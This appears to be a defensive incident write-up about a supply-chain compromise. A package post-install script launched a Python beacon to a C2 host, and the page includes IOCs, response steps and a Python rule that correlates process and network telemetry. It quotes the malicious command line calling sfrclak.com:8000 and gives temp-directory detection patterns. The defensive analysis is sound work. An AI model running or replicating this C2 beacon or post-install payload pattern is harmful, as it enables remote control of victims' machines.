Severity: High | ATT&CK: T1059.006 (Command and Scripting Interpreter: Python), T1071.001 (Application Layer Protocol: Web Protocols) | Tactic: Command & Control

C2 Network Activity

Python-based payload making outbound HTTP connections to attacker-controlled infrastructure.

What Happened

A Python script, /tmp/ld.py, was observed making outbound HTTP connections to an external host, sfrclak.com on TCP port 8000. The process was a child of a package manager install, which points to a supply chain compromise: a malicious package carrying a post-install script that launched the payload from /tmp.

Network telemetry showed repeated TCP connections to port 8000, consistent with a beacon polling the C2 server for additional instructions. The process hash did not match any known legitimate software.

Evidence

JSON telemetry showing C2 network connections and process details

Key Indicators

  • Command Line: python3 /tmp/ld.py http://sfrclak.com:8000/6202033
  • C2 Server: sfrclak.com on port 8000
  • Protocol: HTTP over TCP, outbound connections
  • File Hash: 8295ee25cfdb239f3e165afceda7f46de73e2b606ff0e2e3d8623e3facd30acc
  • Entry Vector: Malicious package post-install script

Response

The affected host was isolated from the network. The malicious script and the package that installed it were removed. The C2 domain was blocked at the firewall and at the DNS layer. All endpoints were then swept for the file hash and the network IOCs.

Lessons Learned

  • Package manager installs execute arbitrary code (pip runs setup.py for source distributions; npm runs preinstall/install/postinstall lifecycle scripts). Monitor the whole process tree rooted at the package manager binary, not just the install event.
  • Interpreters executing scripts from /tmp, /var/tmp or /dev/shm that then open outbound connections are a strong compromise signal. The script name, hash and C2 domain are cheap for an attacker to change; the behaviour is not, so detect on the behaviour and sweep on the IOCs.
  • Correlating process creation with network activity by PID gives the full picture fast: parent process, command line, file hash and destination land in one record.
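The correlation described in these lessons, as an added example that is not the page's own telemetry or tooling. It joins newline-delimited JSON process and network events by PID, flags interpreters running a script from a scratch directory that also make outbound connections, and raises the severity when the parent is a package manager. The record shape (event_type, pid, ppid, image, cmdline, sha256, dest_host, dest_port), the package-manager and interpreter lists, and the sample events are all constructed assumptions; the sample reuses the page's IOCs only so the rule has something to fire on.

```python
"""Correlate process and network telemetry to flag an interpreter running a
script out of a world-writable temp directory, spawned by a package-manager
install, that then opens outbound connections.

Added example, not the page's own telemetry or tooling. The record shape and
the sample events below are constructed for illustration.
"""
import json
import re
from collections import defaultdict

# Constructed sample telemetry, one JSON object per line (hypothetical schema).
SAMPLE_TELEMETRY = "\n".join(json.dumps(e) for e in [
    {"event_type": "process", "pid": 4101, "ppid": 900, "image": "/usr/bin/pip3",
     "cmdline": "pip3 install somepkg"},
    {"event_type": "process", "pid": 4120, "ppid": 4101, "image": "/usr/bin/python3",
     "cmdline": "python3 /tmp/ld.py http://sfrclak.com:8000/6202033",
     "sha256": "8295ee25cfdb239f3e165afceda7f46de73e2b606ff0e2e3d8623e3facd30acc"},
    {"event_type": "network", "pid": 4120, "dest_host": "sfrclak.com", "dest_port": 8000},
    {"event_type": "network", "pid": 4120, "dest_host": "sfrclak.com", "dest_port": 8000},
    # Benign control: a service script under /opt talking to an internal API.
    {"event_type": "process", "pid": 4200, "ppid": 1, "image": "/usr/bin/python3",
     "cmdline": "python3 /opt/app/worker.py"},
    {"event_type": "network", "pid": 4200, "dest_host": "api.internal.example", "dest_port": 443},
])

# Assumed lists; extend to match the package managers and interpreters in your fleet.
PACKAGE_MANAGERS = {"pip", "pip3", "npm", "yarn", "pnpm", "gem", "bundle", "composer", "cargo"}
INTERPRETERS = {"python", "python2", "python3", "node", "perl", "ruby", "sh", "bash"}
# A script argument living in a world-writable scratch directory.
TMP_SCRIPT = re.compile(r"(?:^|\s)((?:/tmp|/var/tmp|/dev/shm)/\S+)")
# A URL passed on the command line, captured as a candidate C2 indicator.
URL_ARG = re.compile(r"https?://\S+")


def _basename(path):
    return path.rsplit("/", 1)[-1]


def parse_telemetry(text):
    """Split newline-delimited JSON into a pid->process map and a pid->connections map."""
    procs, conns = {}, defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("event_type") == "process":
            procs[ev["pid"]] = ev
        elif ev.get("event_type") == "network":
            conns[ev["pid"]].append(ev)
    return procs, conns


def correlate(text):
    """Return one alert per interpreter process that runs a temp-dir script and
    has at least one outbound connection. Severity is "high" when the parent is
    a package manager (the post-install script pattern), else "medium"."""
    procs, conns = parse_telemetry(text)
    alerts = []
    for pid, ev in procs.items():
        if _basename(ev["image"]) not in INTERPRETERS:
            continue
        script = TMP_SCRIPT.search(ev.get("cmdline", ""))
        outbound = conns.get(pid, [])
        if not script or not outbound:
            continue  # need both the scratch-dir script and a network connection
        parent = procs.get(ev.get("ppid"))
        from_pkg_mgr = parent is not None and _basename(parent["image"]) in PACKAGE_MANAGERS
        url = URL_ARG.search(ev["cmdline"])
        alerts.append({
            "pid": pid,
            "script": script.group(1),
            "sha256": ev.get("sha256"),
            "parent_cmdline": parent.get("cmdline") if parent else None,
            "spawned_by_package_manager": from_pkg_mgr,
            "c2_url_arg": url.group(0) if url else None,
            "destinations": sorted({(c["dest_host"], c["dest_port"]) for c in outbound}),
            "connection_count": len(outbound),
            "severity": "high" if from_pkg_mgr else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_TELEMETRY):
        print(json.dumps(alert, indent=2))
```

Run against the sample it emits a single high-severity alert for PID 4120 with the script path, hash, parent command line and C2 destination in one record, and stays silent on the /opt worker. The hash and domain in the alert are what the sweep in the Response section consumes; the behavioural match is what keeps the rule firing after the attacker rotates them.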
